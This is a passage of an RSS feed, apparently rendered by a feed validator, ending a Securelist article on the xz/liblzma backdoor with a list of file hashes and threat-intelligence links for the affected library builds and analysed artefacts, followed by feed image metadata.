  2112. <a href="https://opentip.kaspersky.com/4f0cf1d2a2d44b75079b3ea5ed28fe54/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4f0cf1d2a2d44b75079b3ea5ed28fe54</a><br />
  2113. 72e8163734d586b6360b24167a3aff2a3c961efb<br />
  2114. 319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae</p>
  2115. <p><strong>Debian Sid liblzma.so.5.6.1</strong><br />
  2116. <a href="https://opentip.kaspersky.com/53d82bb511b71a5d4794cf2d8a2072c1/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">53d82bb511b71a5d4794cf2d8a2072c1</a><br />
  2117. 8a75968834fc11ba774d7bbdc566d272ff45476c<br />
  2118. 605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4</p>
  2119. <p><strong>Related files</strong><br />
  2120. d302c6cb2fa1c03c710fa5285651530f, liblzma.so.5<br />
  2121. 4f0cf1d2a2d44b75079b3ea5ed28fe54, liblzma.so.5.6.0<br />
  2122. 153df9727a2729879a26c1995007ffbc, liblzma.so.5.6.0.patch<br />
  2123. 53d82bb511b71a5d4794cf2d8a2072c1, liblzma.so.5.6.1<br />
  2124. <a href="https://opentip.kaspersky.com/212ffa0b24bb7d749532425a46764433/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">212ffa0b24bb7d749532425a46764433</a>, liblzma_la-crc64-fast.o</p>
  2125. <p><strong>Analyzed artefacts</strong><br />
  2126. <a href="https://opentip.kaspersky.com/86fc2c94f8fa3938e3261d0b9eb4836be289f8ae/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">35028f4b5c6673d6f2e1a80f02944fb2</a>, bad-3-corrupt_lzma2.xz<br />
  2127. <a href="https://opentip.kaspersky.com/b4dd2661a7c69e85f19216a6dbbb1664/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">b4dd2661a7c69e85f19216a6dbbb1664</a>, build-to-host.m4<br />
  2128. <a href="https://opentip.kaspersky.com/540c665dfcd4e5cfba5b72b4787fec4f/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">540c665dfcd4e5cfba5b72b4787fec4f</a>, good-large_compressed.lzma</p>
  2129. ]]></content:encoded>
  2130. <wfw:commentRss>https://securelist.com/xz-backdoor-story-part-1/112354/feed/</wfw:commentRss>
  2131. <slash:comments>2</slash:comments>
  2132. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11172300/sl-backdoor-keyhole-binary-malicious-actor-scaled.jpg" width="2666" height="1500"><media:keywords>full</media:keywords></media:content>
  2133. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11172300/sl-backdoor-keyhole-binary-malicious-actor-1024x576.jpg" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
  2134. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11172300/sl-backdoor-keyhole-binary-malicious-actor-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  2135. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11172300/sl-backdoor-keyhole-binary-malicious-actor-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  2136. </item>
  2137. </channel>
  2138. </rss>
  2139.  
Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda